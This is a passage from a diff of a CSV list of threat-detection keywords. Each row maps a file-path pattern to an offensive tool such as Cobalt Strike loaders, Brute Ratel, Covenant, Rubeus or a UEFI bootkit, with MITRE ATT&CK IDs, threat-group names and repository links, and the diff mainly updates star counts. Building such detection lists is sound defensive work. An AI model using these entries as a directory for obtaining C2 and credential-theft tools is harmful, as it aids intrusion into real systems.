and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*/BooExecutor.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*/bq1iFEP2/assert/dll/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/bq1iFEP2/assert/exe/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
@@ -2949,97 +2955,97 @@ "*/Bropper.git*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/Browser-C2*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" -"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/bruteforce.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure 
environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" -"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*/bruteratel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/brutespray/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/BucketLoot.git*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" 
-"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*/BuildBOFs/*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/burp/releases/community/latest*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/burp-api/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*/burp-Dirbuster*","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","71","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" "*/burpee.py*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*/BurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" -"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
